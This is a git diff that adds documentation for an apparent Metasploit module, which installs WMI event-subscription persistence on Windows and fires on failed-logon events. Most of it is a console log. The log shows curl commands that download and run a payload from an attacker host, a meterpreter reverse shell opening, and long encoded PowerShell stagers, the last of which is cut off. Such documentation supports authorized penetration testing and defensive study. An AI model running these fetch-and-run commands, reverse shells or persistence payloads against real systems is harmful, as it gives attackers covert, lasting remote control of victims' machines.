diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md new file mode 100644 index 0000000000000..6e5cc5418d7ab --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md @@ -0,0 +1,158 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that will query the event log for an EVENT_ID_TRIGGER +(default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing +must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon +/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_event_log` +4. Do: `set session #` +5. Do: `run` +6. Create a Windows event to trigger the event, such as an SMB Login +7. You should get a shell. + +## Options + +### EVENT_ID_TRIGGER + +Event ID to trigger the payload. Default: `4625` + +### USERNAME_TRIGGER + +The username to trigger the payload. Default: `BOB` + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence Install + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_event_log +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit +[-] Msf::OptionValidateError One or more options failed to validate: SESSION. +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > [*] Installing Persistence... +[*] Powershell command length: 6767 +[-] Compressed size: 14204 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14204 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I { 1 } L g O H W k C { 1 } 6 W Z T V f b 6 p K F / 0 r P 0 r 3 W H R h i u O k 7 K 9 n y x w H Z k b + I 3 K s H t u H q J E 7 w S Q w o 8 O t 7 P / u V z Z k 3 E y 0 j q d 7 6 3 L W r 9 D / 5 4 8 v X X 4 f H H w + P T / / 7 r 3 / N H 5 7 + 9 o / V 5 t f X z f b 7 w 3 9 + 6 O j v Y v w a n 2 e D + Z c P / / j w R x 2 H { 2 } B x j 1 2 T f Y j S O T Z k 1 M S q j q r N j D D 9 F 1 W S / Y t C J a R 3 X M S x i V 2 f f Y 5 j H f e j a q + M m s m k M l 3 H f x F P k n 3 j v J 7 / 1 X i d 6 E c s m u 4 p R k Z 4 f d u K 2 z v 7 g O V 0 X n H O S t y 2 z u d 8 r s z 3 X H X r l 3 V i X 2 c f o d W L R Z F 9 j e O D 3 N 9 4 b B + / v 0 b v D 8 9 s y n i P f 6 z m u R W y b 7 C l { 2 } k e T r f D 3 3 F / Z s a ' + ' + 7 v 4 q H W 7 5 H 1 6 2 C 3 5 P 6 J f j f x / z m 3 w 3 N P n K N z r 2 J g u 1 9 b u 5 7 w 1 2 1 k W / 7 / U { 2 } Z v y P P z v W ' + ' 6 U T f Y S w 2 7 c W 9 8 x 7 9 1 H / y C / Z 0 N + 2 5 5 8 j J w 3 5 E 3 q 6 L z L 3 8 u u 7 D H F Q / r 3 d j E P 3 Z f d D 0 3 ' + ' 8 j l E n y j I r Y r j D n n E M d r F p s n 7 k u e R k X 2 J w i E m j a 7 + W / H i N w T j u I h v F q I r b B n 0 q 5 L w i Z 4 7 d 6 X 3 5 Q X E L x U u / T + d I j 6 f o 7 2 N V Z 7 / x 7 1 0 d l + g 9 w W + D i j i / c a 7 y Y 0 2 c 5 p F 1 O f + e / N P v k 3 7 6 / Y i + s 8 g + R 3 8 c u z J e o r / D P z 9 i U K O v / F 1 K j / i I n Z X z a R l F { 2 } V f I W 9 e S K 3 / q / 7 / Q f 1 K { 2 } 8 l h + K 7 P r { 2 } B 3 Q 8 7 n N i y v u L 2 r 5 ' + ' U f f v 0 V f X w n L L u ' + ' { 2 } n i L f p 6 L 6 K L f w r 0 { 2 } F a 6 I n 8 Z U + I n O X 8 0 k i + / y 1 9 3 M T p y / 7 9 j O I 5 F Z ' + ' F n 0 j u j d R X / p V a { 2 } X r / r / o i S + F f p c 4 b c d e v Q V V + T L 7 n ' + ' v q o f e J / L q i ' + ' b n T e h e O K / t J n H Z K D X u g p e e t S e v e r p P e w J r 9 e e U 9 y L q k z + e 0 H 9 i 9 D e S 1 9 C u K k 9 6 S 3 7 { 2 } n 0 H v J k X 2 Q l z + n 3 h e s d e a q L F f k p v S b 4 q V 9 K L v 6 u i { 2 } + F n r L z K / r f + v m S / J R d O X J + 4 4 8 C f y t + s r 8 g r w v L 2 f O e 3 y + o M 8 m V P N e X 9 { 2 } r I n 7 V x p k N e r H l e 9 r 6 k 8 7 M N c t f k t + Q q r 0 r 8 W e L H n D h S v z v O V 3 y D 8 y 7 Q x / 5 V H O d 1 l r e 4 d x t 5 F b N a 9 i j u E + 6 P a p 7 7 z H m S O 8 I u n T P C b 6 t S e u u c K X 6 V v 1 Q P 1 m 9 C / v a M g 4 / 4 S ' + ' X F 1 / s 4 b n S t 7 Z n V 2 g 7 9 3 5 B d 1 U O L / T z { 2 } j f l K e L H 2 + 7 Z N e + E H 6 L q j 3 H n b E Y w z 2 C U / 7 f v 8 a u 3 f o N T B O 3 a X 4 J v 9 s u V K n J X h R k 4 / f 8 U N V K 1 + x I y R P 5 / 7 R y { 1 } 7 i C 0 7 ' + ' K 3 j V y h 0 f k f k n 5 Q f 0 X 3 J 8 6 j 2 r p K 7 u l x 9 F 5 H X p O / t y C Y y N f l y k P ' + ' Z T / 1 U F M P X Z 5 7 b v 9 / S 1 5 u 7 O + I t e u 5 F l 4 o P + U P n T 9 J e p I H Y 3 D g B n y 9 p 7 / 0 X { 1 } f C p x 3 X b 8 T l V H / 3 I b + e / S R c I j / 7 j q v j J X 9 c k K / T I O 9 2 5 N s E + 6 a h / M m N L 9 f Y s X H d H Y n / C L x 3 n B W X B + P z { 1 } X 0 H v C / / f 2 3 7 4 j N 6 3 r X 5 7 j o { 1 } d + q E L 8 q z b + S j / O a 6 L m w 3 u C Y 8 V F x W ' + ' d T Q 8 p / x 4 w 8 + F + 8 8 n / v + 7 x Y 0 v 6 L E w n i 3 l N / C 6 { 1 } r 8 q 4 r Y h H 9 W n 7 E / l x w Q 5 i v / K / S P H j 3 c x K P F H B z u 2 1 J { 2 } e U 1 y m n L 8 k 7 4 T 7 q v t h 2 7 + + k P 9 6 b + 7 + F + m c e / J 1 2 E k 4 M 1 T ' + ' / a s D L Q / L X Y J f w U X Y s j Y P m E b + x d + b f e e o v 0 r + y n w v 8 9 I K / Z l z p Q + { 1 } k f g 8 9 n + Q 3 P h 9 / S v 4 c H F { 2 } 8 F 6 F 4 6 / 9 3 5 I P w e R f h e p + C 8 5 x X U u c l c f u C 3 Q V + V L + U v Q P w c m o 8 { 1 } c e k h / J d / p g T 1 1 W g V w N u V ' + ' O T / q e + l + H b p d w f y V u 9 d 8 n v q f t z B b 1 8 d 9 5 { 1 } + y t s b + q b w T / W 2 I r + F C 3 + i j 8 5 f c Z 7 7 k e x 0 P r m P S N 9 T 3 s q u l X F 6 j z 4 l + t 5 x r v J g 0 e b D L h Q / + ' + ' W 9 L / U m + 5 O w j P 8 { 1 } r / u L + B D 4 j ' + ' P W + Q o 9 9 l C R 4 3 5 M 8 S ' + ' / e Z 1 8 u M 9 9 i r f N t i j u l i 8 4 0 E X P c T D X o j j 1 P y s w C + v 1 o t 6 k J w Z + C v 9 T v V X E B d 4 D T x { 1 } 5 6 l u J y n P 5 U f 5 Z w s e j 6 h z n j t g 1 4 S 4 F + 5 j S 5 7 v 0 r d u w ' + ' Q / i U c t + + X l m P l E k f j Q w 7 l T I 3 4 C T w o U t + J r u / y ' + ' B P V u Y P X X D 0 j b j P s E / y d P / C e c r 5 u i 5 r + i U 8 L n P 9 y L 4 j d X f n v l k T 9 7 3 7 D H b l x v s D e V m Q F w P H 5 U g + q y 6 m b T + 5 4 d y N e f M e f n N N f B b m L 4 V 4 X u I P i t e a 9 3 b u 0 2 P 0 a 8 { 1 } f 4 f I r / l H 9 / y I P j V f 9 w { 2 } 8 l 9 b 5 2 X T T o N T a O t L y o q h P P F k + 5 w k 7 h w k f 8 M y U + u X l 8 n 7 g W 6 K v r x P U I L x I O D + E T 8 B 3 z g q n r i n i b n y c e J D 7 5 h p + V T 3 v w Q X a / Y e c N d g q H 5 z w n u y S 3 R x 7 O m s Q T d l z l / 3 n b z 7 b O s x p 7 r 7 H z x B t 3 d e p P J 7 w v j Q 9 7 8 O r y 3 D 8 { 2 } 7 u P f 3 u s E H M { 1 } v 5 D c 8 Z c / 9 C e f f 0 M c S f / 1 i 3 I C n K s 4 r e J T k q 3 5 6 6 H t D 3 5 E e { 2 } 9 c 7 f I l 8 { 2 } u P f a / s b f X P X t / m w 8 U 7 + f 4 C X K k + W T ' + ' e o j 7 o 9 D 9 5 F X 9 w d 4 w 8 B 9 4 o b 6 U F 5 f t H 3 3 C j / c k p 8 5 u J Z w y 3 5 R P q z B J 9 d H 2 z 8 8 t 4 D z O k f n O b 4 6 Z + U + 9 y n F b W h c ' + ' f i Z P z e t S X H N w Z Y X d K S 4 v 5 O ' + ' 3 C 8 8 K O O n 9 N f Z E + k f P 8 J f m 5 9 B w Y x { 2 } / Y 8 s J v z g v 6 n e T e W 8 6 B v P Q c Y r u k 9 4 L n J F 9 + M f 4 s I / E v + f 2 H c d 1 5 6 H z 8 T v 6 s w L O e 4 9 q x H f C c U 5 z 7 u 5 R X { 1 } + N a 3 3 3 I e r i v H c w H ' + ' 4 V V D 6 / N P / P l v 8 z X y l n 5 R J R 4 h f U r z 7 m X C D c V h 0 v L O O f U z d P + d M n e I b 1 6 2 c + { 1 } v 6 m j e 8 s s T / u u 8 P 9 F 7 / V 6 / K / w + N + / p 4 q + / E i 7 g j w p 9 n 5 N f 0 h w m f C n p B z v j Q 8 n z K / y d 8 H k M / l 4 k f E 7 9 2 3 1 x u E 8 8 V H k i P L g i j 6 V ' + ' H D 7 9 J 3 o r n K u N T 0 P d P u L 2 E n ' + ' 6 l + b 9 p 4 e K 7 V e / 8 k z v / ' + ' { 2 } P v X 5 O T x M / p K e B X l w 5 7 6 { 1 } v 8 J 1 X e { 1 } n 9 C j P / l 0 R l 0 2 Z + r D 8 ' + ' O D K / x 7 + K S 1 k n f 7 n P K H 8 2 1 J 3 w b E v 8 U j 8 q P H e Z f w R + 3 h i v 7 B f 7 s e f 7 k ' + ' b 2 0 f W l C f O b k g f L N / c p 8 Q f m u + W x r f B 9 j 3 0 s 7 N y x 5 T r + / u d 8 z N 6 S 5 8 D v 4 t y N e 0 m f T y p 0 x B + R H / P 7 E 7 1 P / M q + { 1 } X 3 g e L F L 8 0 v z i P n / X 8 q 7 K v L 7 { 1 } z 1 / o E z r v J z i x o m + M i o S T I / B L 8 1 / y W w e c X F { 2 } / y s f S / T 2 o L 8 8 v E 3 B H ' + ' f W 1 F X Q p f 7 p g 3 R 4 7 / + I x 3 ' + ' y g / 5 r e + + { 1 } 9 9 i v w H O 9 8 k v + p P n n U v i m 3 B t d 8 5 f 8 4 v E b 9 f U 4 8 z n t 3 N q w l X j 2 Z S 6 H H p e X 7 a 4 V a H H D f 0 H 3 g P u J T s v 8 M e W P p r i 9 4 w e { 2 } / q n 5 z r 6 c 5 1 4 Y c q n M X 5 M 9 s { 2 } / 2 Q f U 6 { 2 } { 2 } 8 q a g b + q 5 5 s e f Z X + 8 4 f w R v f r d z w 4 g + v { 2 } K O V F 1 M P c e 5 ' + ' j 3 f t B 8 9 z 7 / N { 1 } y R w j f 8 / B { 1 } / q 4 6 6 0 { 2 } / 3 + 0 + 5 b X 9 / n E / e 0 { 1 } H t y 3 + 4 M l f E 7 / X 7 o u D o k v w 0 / R t 2 / + 1 f c c T r 3 I b 1 v i o / h N z C c r 8 M X 9 e l 4 n f N 3 C b / o t f o y W C Y c { 2 } 5 p + n + v T e a { 1 } O e 6 5 w Z / U D X p L / n v o 3 5 S s P c V y L f f d X x k b w S v g 8 u E + 9 B p P 2 d 4 r E E 3 9 J e z j x I 8 2 v 3 7 { 2 } f F o W B P k f D 9 m r l 0 a / z M y f f P 7 d 7 h M v F 4 + q N x 3 H O 8 8 s E 8 b t r O g Q / 8 Z u 4 E ' + ' p ' + ' 9 m 3 t H P 9 1 n w B P g t + ' + ' e h 6 o 2 j 3 N Z + x I + W r + 4 T h V 2 K V 8 3 d U p 3 7 f k s f K p p H 8 z 3 5 e c V 5 3 n 6 W 1 b D z d N w p t T 3 h s 3 + 5 H q B v y u E z 7 5 n N x 9 4 R Y c m I I j i t N 9 g 1 9 O + e { 1 } 4 5 u g j P / / k / { 1 } r / M K 8 0 q V 9 P y L e h 5 8 v X t i + a x 9 3 Q L + n X 7 M k { 2 } Z e K h f e N V N 8 2 N 8 E 7 v V T 6 e 5 4 r z u e b x P e 5 L r 1 N e f O f 8 N f h x q g t 4 p e v K + 4 7 f r f + + E L d 1 y w M n ' + ' + M P 8 P f H c K X N l f k x 1 2 I / z 3 s f z k O K u 9 8 f e J z p ' + ' f z M d K 6 r 1 s E n 6 v 4 W m p 7 x 7 a v B g j Z 9 E ' + ' k n N h R F 8 K D h f d o 7 D H x d 8 W c 0 H W 9 l 4 k H r s x 7 P 3 H + 5 3 b / d ' + ' Y F 9 U / w n ' + ' / 5 z n e e Y / 5 i b v M Q r m 5 5 d 2 3 s l b / 9 4 g t 3 R 9 l c T 7 E v 0 T z 9 6 l f u 2 + p H q U / Q v q 4 7 w f a P c Q 8 r / 3 a e Y N 5 z 6 6 d 1 2 X 4 { 2 } R J / X e Q t 4 X P D 4 p ' + ' z f t 2 S t 7 K n x B 7 N t y c + W 3 j P a B 7 0 f M Z Z + d H 9 J ' + ' e H e 3 P 2 n O ' + ' Z 1 H 3 3 F e f i e e W / { 1 } n N / 9 0 3 a / J 8 8 T v J p 7 T w M { 2 } h c X D I / V m k P W f a 0 3 3 6 + z 7 W / f r s T 3 h h H z 9 S p 3 k 7 z x z Z M z j / N 5 5 v q 1 T P Q 8 / J { 2 } + M Y c R J + b M y ' + ' v m n a / y t z F + U X a / 6 W 5 4 9 J 7 Z f h v m o / d 7 z e e x z 0 v P V t u y b x n H u Q + f E s + D a L t k 0 E / 2 f z d n w / w 7 z Q / X s P / H t j 3 S ' + ' p ' + ' 8 1 / { 2 } { 2 } w T 3 v L o f d W p 3 o Z I O 9 k 9 4 b + T J 8 { 1 } P w b e K 4 4 8 9 w d 5 4 X 7 g P D r P s e Y t 3 o 9 c 4 o 9 b 8 7 s u d e n 9 w d y 4 d q p D c F 2 4 I T t 2 8 { 1 } n j K / i w I + 9 f 0 { 2 } P b 7 q 1 K / M h + 0 7 j R M M 8 d H f c 6 7 V s 1 z 5 3 y o d P y m E f j M 3 X a d 9 / P y e O C u h s W y Y 6 h 9 0 U / i X N l 3 l E n v f X 8 g / e i 5 q F v C W 8 y 8 + M 1 f C 9 9 J 9 l 7 L + S 6 a 3 l v 2 g O / 8 Z 7 k Z d 4 b u k 8 Y B x / ' + ' d D z 2 n e / 9 q / J 1 7 7 j r x w Y q 9 d t P u p + / { 1 } 2 b X r e 5 n q N P f z F X q X T d q P z + F t n o d U j z r v w b z M 7 3 3 0 P E J + p 7 7 r / f i M 5 x X P F X 2 / 5 / 3 2 8 R w P + { 2 } C d + M s U H D 3 z n D r 1 J d X z i r k X f l O m f f i D 5 + 2 2 r g b e N / f a P v f a 4 t O T 3 / d 3 h { 1 } K 9 x s 4 H c J I 9 p n m i + d L P V s + v 5 M + S v W L / f c 6 d e Y 9 w 5 H 3 v N e b g q v 3 N + 8 t z / r l P 5 u 7 L P e r l { 1 } d 6 h / K 6 o K + r L f e r Q 7 k F U l 5 H 2 S Z q r B s i 9 5 T z 9 3 9 9 x h t 2 0 D 0 k 8 Y k 5 + e E / N P p 3 5 M L e f F u Z T 7 / u f P / 1 d z 7 z H c e 6 1 8 5 O / X 5 R l y q + d 5 ' + ' + 8 C e V f g f u H + a / 7 U h 3 d M P L 8 X a W 4 f + r v O 3 v O z + 1 a Z 9 m h 6 r / I 8 b H w 7 t P U 5 b f n E q Z 6 r d t 7 s t v O r 9 + b u R / J n 0 a R 9 7 Y I 6 T P 5 a t f Y e w N M l e S i + 8 d D u 8 e 4 i f Q 9 Y n 7 / 3 q L 4 H / m 5 x h V 0 b 9 j E 9 9 t P g j f U 6 m v 8 z 7 z J H N 6 n P r 1 2 H 3 n d b 7 o K 9 q s 5 d R u ' + ' r / c / C w 7 / 3 D y Y 6 y / Y 5 1 C W 6 l O H s v V + C H U 1 9 ' + ' R H F 0 H 8 0 j ' + ' 7 h v f 5 J M 2 x 5 v n q t ' + ' z P P W 5 4 r L 5 O e c e r n N 9 4 f + / u W 4 + s 9 1 g Y + y T w V z E f 7 5 J e h 9 3 u t f q l f z u E B g / f v f p M 6 8 c u F + f 4 O + b n 3 m m X a 9 0 z 4 X i x / 7 t q 9 Q + H v j c e 0 j 1 W + z t j D p z 3 R F f I X 3 l d 5 D h p z / p J 5 g H m B / Q F 7 Q + a z k e f H D X K n 8 O { 2 } h 9 x P O O 8 d j U L 7 v k / x 9 Z d / y c X 9 X d H 0 V / i 7 C ' + ' 3 o D 9 u u f D x x S X 9 F 3 P 3 x 9 z 9 7 M 3 8 m h L X x z 4 + 5 r z I H 0 P q t L 3 l z R ' + ' X e 3 9 Q M n f p / x / + 8 R 8 f l s e H X x / + 6 / 8 { 1 } B a b ' + ' w R 4 E f { 1 } { 1 } { 1 } { 0 } ' ) - f ' = ' , ' A ' , ' G ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] - Bytes remaining: 6204 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I A L { 1 } O H W k C A 4 W Y S 3 P b y B W F / 0 p 2 T q p m o Q f l O F O V R { 0 } M ' + ' E H 0 O B d I s E N W A q C x J i Y J m S a E s e w d K v z / l O { 1 } 9 R k F W 9 Q p v p x H + e e e 2 7 / K 3 9 8 u X v a P z 5 s H 3 / 8 + 9 d f 5 9 ' + ' s f f / p h u X 6 6 W 2 / u t 3 / 9 c K J / Z + P X 8 P l 6 M P / 9 w y 8 ' + ' f t i G b h V E V V j G c h W E T V k 3 2 L e R 1 K ' + ' G L 2 k d / X M f s S L j + ' + ' F e R M u + P s m h J O Q 9 8 I 0 Z r 0 w 7 I V t z L 6 G { 0 } R P q N v R C X + t D 9 h T 6 d d { 1 } 2 2 W s Y f { 1 } r L J h u H f h G K k P X Z p 3 N / h E E V b j h n 0 I S r V n 8 f x H D b Z u d h F M K m 0 e 9 D 7 3 8 L o z L E G N 7 Y v 2 6 z e e j v Q h 1 k x 2 A c Y h N a 1 p { 0 } B O 4 q w j N l 3 7 t d 5 p + G y D p M 2 P I b L Z / m D v f I v Z B P s X 7 b Z P f b d h u w C v 6 Y h u + r + f x r y N q x a / G / C b c w e O F 9 2 v o T h C f a V X ' + ' h 8 5 / z l M W 5 0 7 i u x / D Y M d d p R h V I Q N 9 u b P 2 q f ' + ' 4 D X P 2 r b B 7 F r M / w q { 1 } O M 5 + 3 k 3 9 8 2 3 C L H 4 p z H b N n 7 p u H 8 J N z J v i b 7 8 O 0 y { 0 } Z h G E P ' + ' l / Q X 7 F a e 9 4 p 3 s { 0 } 3 y r o 7 + j Z + L 7 j z A I ' + ' 5 O { 0 } S e 2 N L 3 o q w 8 L 4 y X L O v T x 6 z N u R j x T t b 4 o f 2 v 2 C f 8 t z z / i b 7 z L p p ' + ' m 0 X u q c n X c E w e / x 7 6 4 / C f q H { 0 } 6 T 3 i Q v y X + f Q z 5 J / k j P J H v q D { 1 } r 3 t f 4 J z x N i b / i I H / O w 7 A k v k / O S 5 O t + X 2 N 3 3 3 s 0 b k 6 b + l 7 c t 1 z + I J P + ' + ' 3 + K X d s 2 v I b R C X F W 3 m K 4 N p 4 ' + ' C e F 3 x X c { 0 } s x w 7 l 8 y v 5 q f B P 6 7 T + j K / 8 f A J H y u M 5 + F X + Y + { 1 } H 8 D H F 3 n n I 9 u R F + X v m W 7 b C l / C + b r R u t E u 4 6 k f 8 b r F v y n 7 F 7 5 p 6 w j / s 1 H r d 9 0 Y e C v A m u 6 + j f l e c h J e 5 6 6 h V X p X f T a s 8 5 6 6 n y L q i ' + ' V V 6 V H + G 5 x 3 7 d O + F 3 2 b M n X m V L X E t w 8 n s Y j c H N C / l Q X F / I 0 y r I v 5 w 6 k b + K R 2 y ' + ' z r K u j S J 1 M A 3 H O s S / l m b o S 3 m a R e i n I / w l 2 H u K s P C v + z 8 K R c D 4 w f n z e F v z I X 8 V 7 T F 0 I p + f O k / G 6 { 0 } 5 y z G + I k n N 2 D W 5 3 f H n E 6 3 P P 9 h v / a P y c P s m f q / E b 5 0 y / x 4 4 x 6 m V P n A + K n e t X 6 G t w J X / M 2 M y 6 { 0 } R / 2 / Y t 0 X 6 q Q 2 3 m v y 1 B I P 4 c I 8 p z h 8 d l 6 7 O v q t V Z w u W Z c t j n W E n + B X + d i 4 L { 1 } 7 1 V o Q b 6 j H l 4 z n V E / H K y d M F 8 Y j w k O J R N u C Q f O h 8 + b m 0 H T 1 4 6 F A / F 3 x v i b v s X s A X u m f R K u 7 C 4 Q w e 0 X 2 y N 4 c X F 8 R J c d H f n z o + u 4 O n a v z R / Q c / y j b h e 2 X 7 9 7 I D + 3 f w x F f y O n V 9 i 0 8 a + a 9 7 Z P c A v O s 8 1 { 0 ' + ' } 9 B f B / M x 0 0 2 5 B z V 6 3 f s m o C f { 1 } f i I / C n P W 5 / / K d S N / B b P 6 5 w l c a / A r e K 3 d l 7 2 4 K 9 w X b k e j Y P v r J 9 T T 7 L L d T e k H r W P + { 1 } i J h x b 2 Y 0 w 9 P X Q 8 W 4 H j Z { 0 } z x W n f 8 r N 8 f w f M s c E 9 { 0 } n V G X D f x 6 y t / X 7 m / i f e O o p t 7 W n D / h f O o h p P p Q X V ' + ' 3 y d d 8 T 7 q 4 b ' + ' + ' + ' a s 8 b s m f 4 q B 1 O 3 B o P K n u C v r a k H X w 3 5 j 6 O S e / 8 q N k v f 5 + ' + ' C k 5 u 6 Q 9 9 9 7 n z j v 9 c x + Z 1 7 S v I h + I k u 4 x P x f W V e J T w j P y s G n B P v W L P n n r r d 3 2 u M M 8 2 5 K 8 l 3 x V 5 i d i j d R X 1 q 3 0 b x 2 F P H M 1 D J f X v / k S f w S / q r K A v j I 1 P + F l 1 J r y d w S u y f 0 C e r z l H f V I 4 / c b + i v q E Z 9 r E x 4 r / d / 5 e c A 7 x w o 6 + e e 0 e P O j v X 1 0 / ' + ' 8 B L 1 3 6 j + Z e 8 c 3 G r / T { 0 } z 1 M b G O A J / y b 9 { 1 } m H h + 6 T 3 x 0 P { 1 } J 2 n l B n Z ' + ' 1 2 / 6 R G v B f H r k 2 e + t u v J u s b x a s D t G z h W / 3 7 E v y l 4 y 0 / A Z 2 W + w B / F c Y 5 9 y n / N u f p 9 C T 7 o Y 9 R / 7 j 5 5 x v 0 b e L x P / u B T 7 E p 6 4 z f 3 C e 8 b 4 v e G P q q 4 L 9 F J q p 8 t d d u H f 5 T P E X b B 3 + ' + ' B b 9 4 N v 4 q h z b u l j i e d O u e 8 a / a V 6 s b 5 R n R 7 q v W 6 S 7 r o O S Z 8 k 3 S H 8 t c o v u D H f ' + ' j 8 V b 9 F f z S M H 6 G j 2 m c 8 X T F 8 a / 8 R y J l + J j X b { 0 } m z 2 v W E 4 c 2 6 a 4 F 9 i i u h / ' + ' t V 7 4 c + P T G + G t { 0 } J O q 2 l X s b Y 8 Q Z P z f B T O L t B N / y J Z + X / Z ' + ' 9 Y v b b d 1 V y / h I H N f n t O / l e e Z + 0 S J T t p h 7 8 1 7 v L 8 c 8 a R 9 7 z x I P n N w + E T c V + 4 / 1 j X f y P P M O n X H 9 w z 7 S 3 S A f q / B W R 9 e C e a F t f s 6 f C I c D u j H i i N 1 b h 0 1 p j / + p D 9 W M d V x 4 o M ' + ' G 3 u 2 B F 5 3 3 { 1 } z 6 y a A + 8 D 8 9 F 4 n p H / S v u e 9 Z P 4 T P x y t R 2 l + T 5 J 3 l e 2 l / 3 p 7 u { 0 } N 3 ' + ' i m 1 f 6 k l 7 b w + h C d ' + ' q 3 4 r P N + G p J P E 4 1 P i t S Y P 8 k f 3 7 a k D r f u T H e b B F / I + Z X 8 f / Z r w r n 5 1 Z l 0 P H 8 h + 9 d { 0 ' + ' } b + s S 6 S f V V m R d P W G e e r d H 7 6 n d T 9 5 u c P D 2 A r 7 V 1 o 3 H o P m J 9 k u L 7 n r / c f T m y 3 r i B B w P 6 o S I u 9 m P R H N f f w 8 N r 7 M P f R n E S T 2 1 C 0 r m l d { 0 } l k 3 + s 7 H + R 8 + 5 x 3 h b 5 H 1 6 N X P H + { 1 } Y z v 8 y I 4 J / V D x j e { 1 } y 9 f d ' + ' j f l ' + ' v O G z M n 9 a w f r G ' + ' N z 8 L M n X h P j v C L v F + 4 T n l O s N 1 1 / E 3 i R O c q 6 I y e v D 9 Z X j f x X / p Z H X Z D 0 n c 7 N i d N V m 3 B 4 Q / 5 H 7 t O P H f 9 / Y d 3 k i K v E z / L j w X z z H q + P + H 9 N v l N d + 9 w Z / V R 8 s o h J l 2 8 c f 3 C b 8 r Y l b 6 M q 2 a 3 9 B x 2 o c 3 4 S 1 7 n r o q A / u k 4 X 6 A B 4 C / 4 c 1 I n P Z M e G u h I / V u 5 L P X j o 1 P w L v y S 9 d O f 6 M 2 5 b e O n S f c j 1 t A M H G f 5 b X 8 i u d / 2 E T i q O + a m t w 8 z r J f H { 0 } 3 H j w / w 5 8 3 4 S E v y 1 z i N a p H m 4 4 d 9 G k P r p C r 0 q X R P b r ' + ' / K X r v O j 6 R A + 8 / z S f { 0 } a / a Z 1 4 9 8 k 6 V 4 i 